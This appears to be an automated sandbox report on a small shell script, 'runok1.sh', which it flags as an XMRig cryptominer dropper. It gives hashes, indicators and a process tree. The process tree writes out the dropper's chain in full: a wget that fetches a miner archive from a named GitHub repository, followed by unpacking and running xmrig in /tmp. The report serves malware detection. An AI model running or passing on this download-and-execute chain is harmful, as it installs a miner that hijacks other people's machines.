Analysis
-
max time kernel
1s -
max time network
899s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
17-10-2024 00:11
Static task
static1
Behavioral task
behavioral1
Sample
runok1.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral2
Sample
runok1.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral3
Sample
runok1.sh
Resource
ubuntu2404-amd64-20240729-en
General
-
Target
runok1.sh
-
Size
142B
-
MD5
425b91f7139485fbaecc3b28a93b682e
-
SHA1
e4407d765dd13af57948ea4baa16d81878906313
-
SHA256
5b1099aa137f2c09e9ab16e245cb15857937b23c04b60f2a3b0f36b176237e3d
-
SHA512
92280fa2aeef5bf43fc20a273b6d9717f7e2107eb719e6593f99bd1d1d38f3f1f97e2dce8be3c61c8e785be5a8e8292702f73ef602749eabdb808706e200e7bf
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/ok1/ok1/xmrig family_xmrig /tmp/ok1/ok1/xmrig xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com -
Processes:
tardescription ioc process File opened for reading /proc/filesystems tar -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
tarwgetdescription ioc process File opened for modification /tmp/ok1/ok1/config.json tar File opened for modification /tmp/ok1/ok1/xmrig tar File opened for modification /tmp/ok1.tar.gz wget File opened for modification /tmp/ok1/ok1/SHA256SUMS tar
Processes
-
/tmp/runok1.sh/tmp/runok1.sh1⤵PID:1575
-
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok1.tar.gz2⤵
- Writes file to tmp directory
PID:1577 -
/usr/bin/tartar xvf ok1.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1606 -
/usr/local/sbin/gzipgzip -d3⤵PID:1607
-
/usr/local/bin/gzipgzip -d3⤵PID:1607
-
/usr/sbin/gzipgzip -d3⤵PID:1607
-
/usr/bin/gzipgzip -d3⤵PID:1607
-
/usr/bin/chmod2⤵PID:1608
-
/tmp/ok1/xmrig2⤵PID:1609
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5a8b18264c6b9ea085feaec1f9d2f7923
SHA1fc38325703e002330c445f0017f6aed64f4a9f20
SHA256d4fe8431827fe2af2991503e4ccb29f2acef400ebea2957f3c669e93353c2f1c
SHA51288d2b724dfc5d8158604ef31ba102d45124cb32f6c2f823eca16321745069a6b28a24625d7ea82c3483a1a07bc52e67c77aae848a6c6585b4a9448a010dd4630
-
Filesize
2.9MB
MD52b9ff325451f304a48a3fe6599613bef
SHA1d6fb1d5f1d993b7e26cb80d8021a4708edc152d6
SHA256748b121b7395204838ad972caef5fe1c45d8336e1220b7260011a1be2ce21c89
SHA512906f828f757d05ea9aa8d7acf56fa81a0026ed81b8b763efd89fda73e01ba3b9ee964a10499321a12310d3ec7513d64cc8fb80a2d0906ce3c24ceff7737712d8
-
Filesize
150B
MD57fd26dcea92a3ad3561867c5735c8ecc
SHA1400fe1a03ef6d4520b88f0c63002266586cdaa0f
SHA256c2db0386506ea30d3b7c375ff40dfc875c2aa7961beb7806a36cf12fc10405b6
SHA512b114cee7f7da66afc53aca2013c63ed0d12740cca8ad46a5164789fe33f1889a2ec313186a29c4fc1dd30a11041db31bb307be1884e15680f4b7627143cbf6d8
-
Filesize
2KB
MD56b2a368c8fb65afcfdedf3790de06cec
SHA157725848151f6a3ff894d262cff6773a343b33a6
SHA25664dda0b03564d8812657259c7df506e95ef6fb73afb3f69662c5a4f978d99156
SHA512b4e30d3f926acbddbf4f12a6835dee0ec82c249d8ceea25848bc1fa087d4a9541864adb8ea665b3b63c8cc27dc49ab9df6629640026105616c94cf0d689f7c10
-
Filesize
6.1MB
MD58d9ccb244ee75723cc11ede206a6fb44
SHA15c3241e2945bad02cb7c82a7ff59daf55c763ecf
SHA256855c03f369bf855bbd4f548c51c1677d30087820e162b6dabae96bce40dccc84
SHA512784611295806ba21af34ae276faa1361830068a7bbfadfdc2040253e273a9da2904f17330f342ba7787b93a7917cef27eb14d95e25a1d6d9ff7ed676c6951c27